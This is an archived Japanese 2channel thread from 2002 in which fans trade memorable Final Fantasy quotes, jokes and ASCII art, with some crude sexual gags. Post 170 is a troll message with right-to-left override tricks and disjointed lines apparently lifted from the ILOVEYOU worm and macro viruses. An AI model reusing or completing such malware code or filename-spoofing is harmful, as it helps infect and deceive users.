2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

FFの名言

1 :名前が無い@ただの名無しのようだ:02/08/01 06:29 ID:???
「別れることは決して悲しいことじゃないよね?離れていても心が通じ合ったよね?
そんな大切なことを教えてくれたんだよね?」

そんな感じで泣いた台詞、感動した台詞を書いてみよう

2 :名前が無い@ただの名無しのようだ:02/08/01 06:32 ID:???
ウボァー(゚Д゚)

3 :名前が無い@ただの名無しのようだ:02/08/01 06:33 ID:???
子供長袖Tシャツ

4 :名前が無い@ただの名無しのようだ:02/08/01 06:36 ID:???
カァメェェェェェェェ!

5 :名前が無い@ただの名無しのようだ:02/08/01 06:58 ID:5rN1s3CI
haguhagu

6 :名前が無い@ただの名無しのようだ:02/08/01 06:58 ID:???
チョコボくせー、チョコボくせーよこのスレ(゚Д゚)

7 :名前が無い@ただの名無しのようだ:02/08/01 07:08 ID:???
このスレすりつぶす

8 :名前が無い@ただの名無しのようだ:02/08/01 07:10 ID:???
エンディングのビビの台詞はホント泣けた。
でも最後ガーネットが人を押しのけて走るシーンに激萎え。

9 :名前が無い@ただの名無しのようだ:02/08/01 07:12 ID:???
多少の犠牲?多少ってゆうても
亡くなった人たちにはそれがすべてなんやで!

10 :名前が無い@ただの名無しのようだ:02/08/01 07:16 ID:h2H6ACx.
>9
それ何?

11 :名前が無い@ただの名無しのようだ:02/08/01 07:25 ID:qQ60TLTw
ハグハグ・・・・ぐちゃ

12 :通りすがりだけど萎えた:02/08/01 07:33 ID:jZpH4iq2
10 名前:名前が無い@ただの名無しのようだ :02/08/01 07:16 ID:h2H6ACx.
>9
それ何?

13 :名前が無い@ただの名無しのようだ:02/08/01 07:37 ID:RqJoTU4Y
FFTはありですか?
FFUは無しですね?

14 :名前が無い@ただの名無しのようだ:02/08/01 08:27 ID:???
ハグハグ=hughug

15 :名前が無い@ただの名無しのようだ:02/08/01 08:39 ID:???
クックック・・・黒マテリア

16 :名前が無い@ただの名無しのようだ:02/08/01 08:41 ID:???
いいですとも!

17 :名前が無い@ただの名無しのようだ:02/08/01 08:48 ID:kN/5KvVw
「FFは、ポップでキュート、
君だけのハートブレイクさ!!」
と野村がいっている夢を見た。
これも立派な名言か??

18 :名前が無い@ただの名無しのようだ:02/08/01 08:54 ID:???
>>17
迷言ナリ

19 :名前が無い@ただの名無しのようだ:02/08/01 09:19 ID:???
誰かを助けるのに理由が要るかい?
がコナンにパクられてた

20 :名前が無い@ただの名無しのようだ:02/08/01 12:35 ID:0Y6OBQW2
>>15
なんかワラエタw

21 :名無し.com:02/08/01 12:46 ID:???
「わたしはネオエクスデス
すべての記憶 すべて存在
すべての次元を消し
そしてわたしも消えよう
永遠に!!!!!」

22 :名前が無い@ただの名無しのようだ:02/08/01 12:49 ID:???
ほひーほひー

23 :名前が無い@ただの名無しのようだ:02/08/01 12:52 ID:???
>>1のセリフで泣ける奴に乾杯

24 :名前が無い@ただの名無しのようだ:02/08/01 12:55 ID:???
また逢えるよね

25 :名前が無い@ただの名無しのようだ:02/08/01 13:04 ID:???
ブジュルルルルッ!!
共同?命令だと??
ブジュルルルルッ!!
おまえら、ダーマされた!
バ〜カ!!

26 :名前が無い@ただの名無しのようだ:02/08/01 13:20 ID:???
「暁の四戦士の登場じゃ!」
涙腺、緩んだ。

27 :Bodiesbeat=の v の)ノ ◆cLqIFidk:02/08/01 13:27 ID:???
畏国王ディリータ
「…ラムザ おまえは何を手に入れた?
「オレは……

28 :名前が無い@ただの名無しのようだ:02/08/01 13:31 ID:???
ファファファ しねい!! ひかりのせんしども

29 :名前が無い@ただの名無しのようだ:02/08/01 17:04 ID:???
おかしいですよ!セフィロスさん!

30 :名前が無い@ただの名無しのようだ:02/08/01 18:28 ID:???
クポポ〜

31 :名前が無い@ただの名無しのようだ:02/08/01 19:08 ID:???
>>17
寧ろお前のレス自体が冥言

32 :カンパネラ:02/08/01 20:18 ID:TYXhW5MQ
>>19
そうだよなあ、ショックだったよ。あの言葉好きだったのに

33 :名前が無い@ただの名無しのようだ:02/08/01 20:20 ID:???
http://www.geocities.co.jp/Outdoors-Marine/1653/R3_temp.swf?inputStr=%81@%81@%81@%81@%81@%81@%81@%81R%7C%2F%81@%81@%0D%0A%81@%81@%81@%81@+%81%5E%81P%81P%81P
%81M%81R%81A%0D%0A%81@%81@%81@+%2F%81@%81@+%81@%81@%81@%81@%81@%81@%81R%0D%0A%81@%81@%81@%2F%81@%81@%81@+%81@%81@%81@%81@%7C%0D%0A%81@%81@%81@%7C%81@%81i%81
%9C%81j+%81i%81%9C%81j+%81@+%7C%0D%0A%81@%81@%81@%7C+%81@%2F%81P%81%DC%81P%81R%81@+.%7C+%81@%81@+%88%D9%8C%EA%95%FA%92u%82%C5%81B%0D%0A%81@%81@%81@%7C%81@+%
7C+.%82%8C%7E%81P%7E%81R+%7C%81@%81@+%7C%0D%0A%81@%81@%81@%7C+%81R+%81P%7E%81P+%C9%81@%81@+%7C%0D%0A%81@%81@%81@%7C%81@%81@+%81P%81P%81P%81@%81@%81@+%7C%0D%
0A%0D%0A

34 :名前が無い@ただの名無しのようだ:02/08/01 20:24 ID:psjAL2dw
まむこOISIIIIIII!!!!!!!!

35 :名前が無い@ただの名無しのようだ:02/08/01 20:26 ID:???
家畜に神は居ない!

36 :名前が無い@ただの名無しのようだ:02/08/02 00:55 ID:???
クルルの「なにをするんだよ!」
そんな言葉遣いして欲しくない。

37 :名前が無い@ただの名無しのようだ:02/08/02 22:58 ID:???
クックック・・・黒マテリア


既出あのは覚悟の上だ。
100回は口に出して言った

38 :「終末は何処へ逝こう」 ◆hhh.ESKY:02/08/03 04:36 ID:???
             ,.-、
.             i、_.,!     , へ
            /       !、__/
          _/_____ /
       ., ‐'"´  ヽ 丶 /ヽ、__
      /   ⌒i  ゝ \ ヽヽ`'‐ 、
     /   ., ‐'"´l l    \ \ l;;;;;;ヽ
     // /    ヽヽ,    lヽ ヽ;;;;;;ヽ
     |/./‐-、/  ‐.、__ヽ i  ヽ  /ゝ;;;\
    /|/i┬ 、   ┬ー-、ヽ |  |/ |;;;;;;;;;ヽ
   /;;;;;;/''ー''"   ''ー---`\ |  |─、/;;;;;;;;;;;;ヽ   / ̄ ̄ ̄ ̄ ̄
  /;;;;;;;/') Σ      _ 。  l |ヽ|;;;;;;;;;`l;;;;;;;;;;;;;ヽ <  な ぜ だ!
 /, ̄/`,'‐-‐- 、_    ヽヽ 人) ヽ|;;;;;;;;;;|;;;;;;;;;;;;;人  \_____
, ‐'"´\ |     ``''ー-、 /|;;;;;|ヽ|/;;;;;;;/\;;;/  ヽ

39 :山崎渉:02/08/03 09:01 ID:???
(^^)

40 :名前が無い@ただの名無しのようだ:02/08/05 17:48 ID:???
           ∧_∧            / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
           (; ´∀`)          < エアリス殺しましょう♪
 ______/| ヽ  l ヽ______ \       ティファ出しましょう♪
(∋     /  v   \|  ヽ      ∈)   \_____________
  ̄ ̄ ̄ ̄|  /     l    人 | ̄ ̄ ̄
       / / ヽ ー   - / \\
      / /  |    |   |   \ヽ
     / /   ヽ       |     \
    //    /  □■□■□■□■□■
   /     |    ■□■□■□■□■□
  /     /    / ヽ    \       | |
../     /    /   \    \     | |
/   /    /       \   \    .|  |
|   (    く          )   )   |  |
|    \   \       ./   /   |   |
|    \   \____/  /.    |   /
 | _――-\  \   /  /-――___| /
  |/   ⊂⌒__)  (__⌒つ    |/

41 :名前が無い@ただの名無しのようだ:02/08/05 20:24 ID:???
ヒーニニーニ!

42 :名前が無い@ただの名無しのようだ:02/08/05 20:33 ID:???
しねい

43 :名前が無い@ただの名無しのようだ:02/08/05 21:20 ID:???
そして・・ぜつぼうと いかりのなかで しねッ!

44 :山崎渉:02/08/08 13:49 ID:???
(^^;

45 :名前が無い@ただの名無しのようだ:02/08/09 21:37 ID:???
ピカチューってのが一番良かった。

46 :名前が無い@ただの名無しのようだ:02/08/09 21:58 ID:???
エクスデス、するかい?

47 :名前が無い@ただの名無しのようだ:02/08/10 01:52 ID:???
「われは……かんぜんあんこくぶっしつ……
 ゼムスの にくしみが ぞうだいせしもの……
「わがなは ゼロムス……
 すべてを……にくむ……!!

 あの音楽もぴったりだ。
 懐古と言われそうだが、昔のFFは(分かり易く極言すると)ベタなファンタジーしてたから名言が多い。

48 :名前が無い@ただの名無しのようだ:02/08/10 02:52 ID:JdaJGbXQ
バレットって言うの…

この選択肢、迷わず選びました(藁

49 :名前が無い@ただの名無しのようだ:02/08/10 02:53 ID:U2sbuhI6
無に帰れ ファファファ

50 :名前が無い@ただの名無しのようだ:02/08/10 02:55 ID:???
リチャード「うぉぉぉぉぉぉぉぉぉ」
だっけ?皇帝が復活したとき。あれはまじで泣いた。

51 :風見月:02/08/10 03:02 ID:Fpq27njE
FFVオープニングより

「クリスタルのひかりを きぼうにかえて・・・」

今でも、いや今だからこそこの言葉にジーンとくるものが
あります。

52 :たまねぎ剣士:02/08/10 03:09 ID:NQjQK4h2
正直FFZ以降は名言が出ていない

53 :名前が無い@ただの名無しのようだ:02/08/10 03:12 ID:???
フリオニールのエンディングでの言葉
「おれたちはいろいろなことをしりすぎた
 もうむかしにはもどれない」
渋い・・・とてもラミアにデレデレしてた男の言葉とは思えない

54 :    :02/08/10 11:57 ID:A/bou2E6
みなさん今までありがとうございました。そしてごめんなさい

55 :名前が無い@ただの名無しのようだ:02/08/10 11:59 ID:o9Y.1uBg
FF8のガーデン交戦時のセリフで
「恐れるな。恐怖は戦闘能力を20%ダウンさせる」
というのがあったような。かっこいい。

56 :名前が無い@ただの名無しのようだ:02/08/10 14:09 ID:???
「泣くぞ すぐ泣くぞ 絶対泣くぞ ほ〜ら泣くぞ」
「だいっきらいだ!」

57 :名前が無い@ただの名無しのようだ:02/08/10 15:54 ID:???
Fwahaha…I finally have it!!
The ultimate power!
Power that will rule the world!!
The power of Nothingness!!

日本語版のセリフを覚えているから辞書を引かずに意味が分かった(w
英語で喋られると洋画みたいでチョト格好いい。

58 :名前が無い@ただの名無しのようだ:02/08/11 06:00 ID:???
「オイラはコスモキャニオンのナナキ。戦士セトの息子だ!」

59 :魔導列車掌 ◆SLvYB9qY:02/08/11 21:42 ID:???
「ウウッ、守ってくれよ・・・
 俺の不思議でお気に入り(大切?)の場所」

FF7,7番街スラムの柱(破壊時)の男の台詞。
何故か涙が出そうになりました。あと駅長のセリフも良かった・・・


「確かに親父だが
 あんたの親父さんではないぞ」

ウォールマーケット・服屋の親父の酒場での台詞。
どこかDQ的なものを感じました。

60 :名無しさん:02/08/12 03:52 ID:OFucWlJa
何事!?

61 :名前が無い@ただの名無しのようだ:02/08/14 00:27 ID:zFZC1mMc
デスピサロの「すべてのにんげんをねだやしに・・・」だっけ?

62 : ◆S5vz/1Es :02/08/14 00:37 ID:???
こおりづけになるがいい

63 :ろまりあ:02/08/14 02:09 ID:???
2のはげが死ぬとこのセリフ

64 :名前が無い@ただの名無しのようだ:02/08/14 02:21 ID:???
混乱しろ!

65 :名前が無い@ただの名無しのようだ:02/08/14 03:31 ID:???
ぬれてにあわ ぬれてにあわ

66 :名前が無い@ただの名無しのようだ:02/08/14 04:10 ID:aMXGJ4Y9
なーるほど!

67 :名前が無い@ただの名無しのようだ:02/08/14 04:23 ID:???
「なりたいものになれるのは、なろうとした者だけだ」


アーロソかっけーーーー

68 :名前が無い@ただの名無しのようだ:02/08/14 04:35 ID:X/ViN641
くろチョコボ みーっけ!!

69 :名前が無い@ただの名無しのようだ:02/08/14 04:35 ID:???
「仕事だからだ」

70 :名前が無い@ただの名無しのようだ:02/08/14 09:53 ID:???
ムスタディオをやっつけろ♥

71 :名前が無い@ただの名無しのようだ:02/08/14 16:05 ID:???
>>50

あれはカッコ良かったけど、よく考えたら死ぬ必要はなかったような気がする。

72 :926:02/08/14 23:13 ID:Fc7RoeSo
俺は絶対って言葉を絶対に信じない

そんな矛盾だらけのアルガス嫌い

73 :フェイタン:02/08/14 23:13 ID:d0159+wC
興味ないね

74 :名前が無い@ただの名無しのようだ:02/08/14 23:28 ID:???
6で崩壊後に
「10回壊されても、11回直してやる」みたいなこという村人がいた

つーか、直すの10回だろ

75 : :02/08/14 23:30 ID:???
ゲコゲコお鳴き!

76 :名前が無い@ただの名無しのようだ:02/08/14 23:32 ID:???
くっくっく・・・くろまてぃや。

77 :ppp:02/08/14 23:32 ID:aBXbcRg2
クラウド『俺はよく精神分裂病だと人から言われる。』
 

 台詞を思いついた人が言われたことがあるんだろうか?
 クラウドのどう言ったところが分裂病なのかゲーム中ではわからないが
 とりたてて真剣に考えているわけではない・・・。


78 :名前が無い@ただの名無しのようだ:02/08/14 23:34 ID:???
おまえもなー

byアーロンinFFX

79 :ppp:02/08/14 23:35 ID:aBXbcRg2
ジタン?『だから歌うんだ、あの歌を。』

もともとドラクエ出身だが素直に感動。

80 :名前が無い@ただの名無しのようだ:02/08/14 23:36 ID:???
おお!ゆうしゃxxxxよ!
しんでしまうとはなにごとだ!

81 :名前が無い@ただの名無しのようだ:02/08/14 23:38 ID:???
あなたを探している・・・

82 :fgj:02/08/14 23:41 ID:Zr5PqNLc
「僕のかわいい小鳥ちゃん。」

 ナルシスト炸裂っっ!!!!!!!!

83 :名前が無い@ただの名無しのようだ:02/08/14 23:43 ID:???
>67
それ言ったのはキマリたんです。

わたしはやっぱこれ
「明日出来ることは明日やればいいんだよ!」

84 :エナイy─(゚∀:02/08/14 23:56 ID:???
グラーフ「ぐふ」


ぐらいしか笑えたセリフないな

FFじゃないか

85 :頼良:02/08/15 10:10 ID:XA0bLAXX
「ねぇどうして助かったの?」 「助かったんじゃない、生きようとしたんだ。いつか帰るべき処へ帰る為に」「だから歌ったんだ…あの歌を」 これでメロディーズオブライフに入ると… こいつぁ泣くっきゃねぇだろ

86 :・∇:02/08/15 10:16 ID:Pzvfk2pw
多くの……数え切れない犠牲がありました
なにをなくしたのかわなくしましたからないくらい
たくさん……なくしました
そのかわり……
もう『シン』はいません
もう復活もしません
これから……
これからは わたしたちの
時代……だよね
不安なこと いっぱいあるけど
時間もいっぱいあるから……
だから だいじょうぶだよね
力を合わせて
いっしょに歩けるよね


ひとつだけお願いがあります
いなくなってしまった人たちのこと
時々でいいから……



思い出しください



いや、最後の部分がね。切なくて○

ビビの遺言補完キボンヌ

87 :名前が無い@ただの名無しのようだ:02/08/15 11:19 ID:87DNXuGk
『ぽかっ!』だろおまいら。

88 :・∇:02/08/15 11:22 ID:???
我が名はフェンビースト

89 :(  ゚ ∇゚):02/08/15 11:41 ID:???
漏れの命そっくりチップにして
モマエらにかけるぜ!

90 :(  ゚ ∇゚):02/08/15 11:41 ID:???
あと
ウボァー

91 :名前が無い@ただの名無しのようだ:02/08/15 11:54 ID:RDgVNBu1
「これはお前の物語だ」

92 :名前が無い@ただの名無しのようだ:02/08/15 11:56 ID:???
「みんなしんでしまったー」

93 :名前が無い@ただの名無しのようだ:02/08/15 13:24 ID:bGsO7D+P
スコール「なぜ人は人に頼るんだ?誰か教えてくれ!・・・誰か?結局俺も誰かに頼るのか。」

94 :名前が無い@ただの名無しのようだ:02/08/15 13:30 ID:rnb+kIj1
指先がチリチリする
口の中はカラカラだ
目の奥が熱いんだ

95 :名前が無い@ただの名無しのようだ:02/08/15 14:00 ID:???
ンッンーこれは名言だな

96 :名前が無い@ただの名無しのようだ:02/08/15 14:57 ID:87DNXuGk
うおおおおおおおおおエッジが、すいとんとらいじんをおぼえた!人間の怒りってものを見せてやるぜ! かえんりゅうで即死。

97 :頼良:02/08/15 18:03 ID:87DNXuGk
「私、あなたを探してる」 「…?」 「あなたに会いたい」 「俺はここにいる」 「(うんうんわかってる…でも…)あなたに…会いたい」 これもE、初めは意味わかんなかったけどのちのちになってからすごく胸キュンした

98 :名前が無い@ただの名無しのようだ:02/08/15 18:05 ID:???
えっ ジタン!?ちょっ、ちょっと待って。    だったっけ。

99 :名前が無い@ただの名無しのようだ:02/08/15 18:20 ID:???
>>67
それ、アーロソじゃなくてキマソのセリフじゃなかった?


100 :Bodiesbeat ◆cLqIFidk :02/08/15 18:29 ID:???
100

101 :・∇:02/08/15 18:55 ID:b4Lmxav/
やはりラブレター作戦は最強のほのぼの爆笑イベントかと

102 :名前が無い@ただの名無しのようだ:02/08/15 19:08 ID:4RdZPncp
・FFY[シックス]
ロックがティナとセリスに対して、
『守るっ!』の一言。どうでしょう。

103 :頼良:02/08/15 20:55 ID:Jaz1i9y9
「エアリスはもう泣かない、笑わない、しゃべらない、怒らない…」だっけ?涙腺のゆるみ最高潮

104 :名前が無い@ただの名無しのようだ:02/08/15 21:38 ID:???
エアリスはもうイかない、咥えない、しゃぶらない、握らない…

105 :名前が無い@ただの名無しのようだ:02/08/15 21:49 ID:???
クックック、黒マテリア…

これも笑ったけど追撃の

ウフフ…黒マテリア

あんたそこまでティファになりきらんでも



106 :名前が無い@ただの名無しのようだ:02/08/15 21:58 ID:???
しずかにしろよ
さけがまずくなる

107 :魔導列車掌 ◆SLvYB9qY :02/08/15 22:33 ID:???
う・か・つ
何だかドキドキしてる・・・・

108 :名前が無い@ただの名無しのようだ:02/08/16 14:10 ID:hO/AH0GM
アーヴァインが孤児院で言うセリフ。
シメの「だから僕は戦うんだ」が死ぬほどイイ!!!


109 :名前が無い@ただの名無しのようだ:02/08/16 15:34 ID:???
スカしてんじゃねぇYO!!
何かノッてきた

110 :名前が無い@ただの名無しのようだ:02/08/16 15:52 ID:???
ねんがんのアイスソードをてにいれたぞ!
  そう かんけいないね
  ゆずってくれ!たのむ
 →ころしてでも うばいとる
なにをする きさまらー
               こうてい「ウボァー

111 :名前が無い@ただの名無しのようだ:02/08/16 15:55 ID:???
名言の宝庫 FFYのオペラ劇場でのセリスの一言
「ドラクゥ〜」
萌え〜

112 :名前が無い@ただの名無しのようだ:02/08/16 15:56 ID:Z/sdg2yE
いやー。ガラハドかと思ったら皇帝だターよ

113 :名前が無い@ただの名無しのようだ:02/08/16 15:59 ID:???
>>111
何でそのセリフに萌えるんだよ(w

114 :名前が無い@ただの名無しのようだ:02/08/16 16:00 ID:???
>>112 ガラハドです
  それが じぶんのうんめいだったのか!
 →ひとのうんめいを かってにきめるんじゃねえよ
               こうてい「ウボァー

115 :名前が無い@ただの名無しのようだ:02/08/16 16:01 ID:???
>>113
じゃぁ
「あの・・ロック?」
ここらの台詞で萌えてろ!とでも言うのか貴様は!

116 :名前が無い@ただの名無しのようだ:02/08/16 16:02 ID:BI2568Yd
不満だろうな、、、それとも不安か?

それでいい。

117 :名前が無い@ただの名無しのようだ:02/08/16 16:03 ID:???
フリオニール「のばら
ヒルダ「?
        自分で教えておいて「?」はないでしょう

118 :名前が無い@ただの名無しのようだ:02/08/16 16:15 ID:???
でも・・・>>113
ストラゴスの「若いのぉ・・」
これが一番名言。

119 :名前が無い@ただの名無しのようだ:02/08/16 16:18 ID:???
「ローザ?なんのことだ?」

ゴルベーザのすっとぼけっぷりが最強。

120 :名前が無い@ただの名無しのようだ:02/08/16 16:20 ID:???
リルム「おあついねえ」
ストラゴス「若さ、じゃのう」
だっけ?
>>115
どこの誰の台詞それ?セリス?

121 :・∇:02/08/16 16:22 ID:IpOQGPSe
>>120
オペラでマリアの衣装を着たときに
ロックに衣装を見せた(ロックが楽屋を覗いた時)のセリフだと思われ

122 :名前が無い@ただの名無しのようだ:02/08/16 16:24 ID:???
あちちっ!

123 :名前が無い@ただの名無しのようだ:02/08/16 17:10 ID:CL3OK1nF
アルティミシアのセリフはネオエクスデスのパクリ。でも
最後に「そしてわたしも消えよう。永遠に!!」って言うネオエクスデスに軍配!!

124 :名前が無い@ただの名無しのようだ:02/08/16 17:18 ID:3qVRPU1Z
>>1?悪いな覚えてない

125 :名前が無い@ただの名無しのようだ:02/08/16 17:24 ID:H4ROdBaV
いや、最高の名言はやっぱり、
「ガウ、頑張る!!」だな

126 :名前が無い@ただの名無しのようだ:02/08/16 17:27 ID:???
>>123
消防の頃はよく「お前だけ消えてくれ!」とエクスデスにつっこみたくなったな……(w

127 :名前が無い@ただの名無しのようだ:02/08/16 17:36 ID:???
くっくるゆ〜

128 :名前が無い@ただの名無しのようだ:02/08/16 18:25 ID:QzUDLWdM
ビッグブリッジでのギルガメッシュ
「この扉の向こうで待ち構えていたのだ!
来なかったらどうしようかと不安になっていたところだぜ!」

次元の狭間でのギルガメッシュ
「このまま逃げたらカッコ悪いまま歴史に
残っちまうからな!」

ゼザ船団でのギルガメッシュ
「ひろーいうみー あおーいそらー
...って、いい気分に浸っているところを
じゃまするのはだれだ!」

[でのギルガメッシュ
「おまえなのか、バッ...」

どうでしょう?



129 :名前が無い@ただの名無しのようだ:02/08/16 18:30 ID:lntXLVlZ
アルティミシア
「すべての時間を圧縮し、すべての存在を否定しましょう。」

130 :名前が無い@ただの名無しのようだ:02/08/16 19:00 ID:???
ゼザ船団でのギルガメッシュ
>「ひろーいうみー あおーいそらー
>...って、いい気分に浸っているところを
>じゃまするのはだれだ!」
「いい気分に浸っている私を」じゃなかった?


131 :名前が無い@ただの名無しのようだ:02/08/16 19:02 ID:QzUDLWdM
130
アリガト!

「急用を思い出したぜ」もいいね

132 :魔導列車掌 ◆SLvYB9qY :02/08/16 19:05 ID:???
どうやら、君とは友達になれないようだ(なれそうもないな?)

133 :名前が無い@ただの名無しのようだ:02/08/16 19:09 ID:QzUDLWdM
「ぜぜん」
「どぞう」

134 :名前が無い@ただの名無しのようだ:02/08/16 19:13 ID:7msl6Hp/
ラスボス戦のケフカのセリフ。
基地外ってこんな感じなんだろうなーと素直に思った消防時代。
今考えると微妙に深い。

135 :名前が無い@ただの名無しのようだ:02/08/16 19:13 ID:???
>>132
なるほど。友達になれないようだ。
神羅ビル屋上での若社長のセリフだね。

136 :黒のタイツ2号:02/08/16 19:19 ID:???
シド・・・・・・パシリ?

137 :名前が無い@ただの名無しのようだ:02/08/16 19:20 ID:???
やっぱ最強のセリフは
「ウボァー」

138 :名前が無い@ただの名無しのようだ:02/08/16 19:53 ID:zmFE37qt
ケフカ「シンジラレナーイ」

139 :名前が無い@ただの名無しのようだ:02/08/16 19:58 ID:3qVRPU1Z
すべての時間を圧縮し、>>1のすべてを否定しましょう。
>>1、パシリ?
>>1?悪いな覚えてない。

140 :名前が無い@ただの名無しのようだ:02/08/16 19:59 ID:???
シド、死ぬ間際に飛空船を譲るシーン
「いいか、貸すだけだぞ!大事に使え」

141 :名前が無い@ただの名無しのようだ:02/08/16 20:00 ID:3qVRPU1Z
でも一番感動して泣いたのは
FF[でサイファーがギルガメッシュに飛ばされた時のセリフ。
「ぎにゃぁぁぁぁぁぁぁぁぁぁーーーーーー」
これに尽きるね。

142 :,:02/08/16 20:22 ID:???
俺たちが乗っちまった列車は、途中下車できねえぜ!!!!!!!!!!

143 :名前が無い@ただの名無しのようだ:02/08/16 20:24 ID:???
二本足で立つのも難しいものだな。

144 :名前が無い@ただの名無しのようだ:02/08/16 20:31 ID:d14soLVA
セリフっつーか、8の主題歌の、アイズ・オン・ミーの歌詞かな。

145 :名前が無い@ただの名無しのようだ:02/08/16 20:33 ID:???
魔大陸にて、シャドウに三闘神の像を動かされ
ケフカが下敷きになった時のせりふ
「うきゅ!」

こんなラスボスでいいのかよ〜

146 :名前が無い@ただの名無しのようだ:02/08/16 21:23 ID:???
>>143それなんだっけ?

147 :143:02/08/16 21:28 ID:???
>>146ナナキが船で兵士のふりしてるときに言う言葉。

148 :名前が無い@ただの名無しのようだ:02/08/16 21:33 ID:???
「言ったろう、世界最速の船だって。」
まじ泣きそうになった。ちょいうろ覚えだけど。

>146
ナナキのセリフ



149 :名前が無い@ただの名無しのようだ:02/08/16 21:36 ID:???
「俺は試験が好きなんだよ!」
サイファーの頭の悪さがよく現れてる

150 :名前が無い@ただの名無しのようだ:02/08/16 21:42 ID:???
かいふくしてやろう

151 :名前が無い@ただの名無しのようだ:02/08/16 21:49 ID:???
FF9最後の場面。
ガーネット「ジタン、あそこからどうやって助かったの?」
ジタン「あの歌を歌ったのさ」
スタッフロールへ。

152 :名前が無い@ただの名無しのようだ:02/08/16 21:52 ID:???
「興味ないな」

153 :名前が無い@ただの名無しのようだ:02/08/16 22:00 ID:???
>>152
「興味ないね」じゃないの?

154 :名前が無い@ただの名無しのようだ:02/08/16 22:03 ID:???
>>153
152じゃないが
どっちも言ったと思う……

155 :名前が無い@ただの名無しのようだ:02/08/16 22:07 ID:???
フシギナジュモン サ サッサカサ!

156 :名前が無い@ただの名無しのようだ:02/08/16 22:09 ID:5hyX77x/
「このことは、みんなには秘密だからな」(うろ覚え)
このシーンで、大嫌いだったスコールがちょっと良いヤツに思えた。

157 :名前が無い@ただの名無しのようだ:02/08/16 22:55 ID:???
ドン・コルネオ「ほひ〜ほひ〜」

158 :名前が無い@ただの名無しのようだ:02/08/16 23:56 ID:???
「ちくちくちくちくちくちくちくちくちくちくちくちくちくちくちくちくちくちく
ちくちくちくちくちくちくちくちくちくちっくしょ〜〜〜〜〜〜〜〜っ!!」
ケフカを尊敬した。

159 :名前が無い@ただの名無しのようだ:02/08/17 00:10 ID:n5oEXY8j
6でガウが父親と会うイベントでのセリフがよかった
よく覚えてないけど
「オヤジ生きてる ガウ しあわせ」
みたいなこと言ったと思うんだけど、ぐっ!と来た。

160 :名前が無い@ただの名無しのようだ:02/08/17 00:19 ID:LUp0fbaL
時々でいいから、思い出してください!!!!
感動!!!!!!!!!!!!!


161 :俺と百式 ◆HqcvRAGE :02/08/17 00:20 ID:???
セッツァーの「もう一つの翼を蘇らせに!」みたいのが好き
飲んだくれだったけど

162 :名前が無い@ただの名無しのようだ:02/08/17 00:25 ID:???
翼を失っちゃあ世界最速の男になれないからな
よろしく頼むぜ「ファルコン」

BGM【仲間を求めて】

163 :名前が無い@ただの名無しのようだ:02/08/17 00:26 ID:vyLDGiaB
7のケットシーが
終盤、テロをしたバレットに熱く文句を言ったセリフ。
「ポリポリって何ですか?マリンちゃんだけ大丈夫なら
他の人はどうなってもいいんですか?」みたいなの。

多少って何ですか?
その人にしてみれば、それが全て・・・みたいなことを言ったんだ。

164 :名前が無い@ただの名無しのようだ:02/08/17 00:42 ID:???
「今更疑うものか!私はお前を信じる!」
カッコよすぎ・・・惚れた・・・

「家畜に神はいない!」
味方ユニットだが思わず殺してしまった(;`∀´)=3

FFTは読ませる台詞多いよね。

165 :名前が無い@ただの名無しのようだ:02/08/17 00:51 ID:???
バトルプログラマーをなぐるとは!このやろーじばくしてやるっ!

166 :名前が無い@ただの名無しのようだ:02/08/17 02:05 ID:???
>>164
俺もアルガス毎回殺してたw

ぬれ手にあわ
ぬれ手にあわ

ってこれFFだったっけ?

167 :魔導列車掌 ◆SLvYB9qY :02/08/17 03:09 ID:???
>>135
ええ、大した活躍もせずに死んでいった青年のセリフです

やると思ったぜ・・・・

168 :名前が無い@ただの名無しのようだ:02/08/17 07:57 ID:???
>>166
ぬれてにあわってロマサガ3のはず

169 :名前が無い@ただの名無しのようだ:02/08/17 11:10 ID:Jmh1ae/d
それでは金が稼げンのだよ!ラッド、ラムザッ!オレについてこいっ!!

170 :あひゃ ◆CTR8AHYA :02/08/17 11:18 ID:???
&rlo; http://wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
以上、ケン・コロスでした!  
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥
&rlo; ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥ ♥

171 :名前が無い@ただの名無しのようだ:02/08/17 12:00 ID:???
>>165
「しぬぞ」にぞっとしたよ。

172 :フェイタン:02/08/17 12:16 ID:NjAq4XLv
あ〜あ〜、「マテリア・ハンター ユフィ」最終回、「マテリアよ永遠に・・・・」
ってカンジ

173 :名前が無い@ただの名無しのようだ:02/08/17 13:24 ID:HbqUjUY2
これは俺の物語だ!!
ベタ上等。マジでコレ好きなんです。

174 :名前が無い@ただの名無しのようだ:02/08/17 20:44 ID:uPhuibdM
「はやくきて じらさないで・・」

「・・・・ゴクッ・・・・」

175 :L ◆i8o9FWDE :02/08/17 20:45 ID:???
>>173
「これが俺の物語だ!!」です。
臭いがジーンときたね。うん

176 :ざんかんせんせい:02/08/17 20:52 ID:???
スラムの花売り

177 :名前が無い@ただの名無しのようだ:02/08/17 20:52 ID:???
「 うぴょ 」
 パルマ−

178 :名前が無い@ただの名無しのようだ:02/08/17 21:46 ID:???
ジタン
「いなかった、か・・・・・。過去形だな。
俺にはもとから親がいない。」

179 :Bodiesbeat ◆cLqIFidk :02/08/18 00:16 ID:???
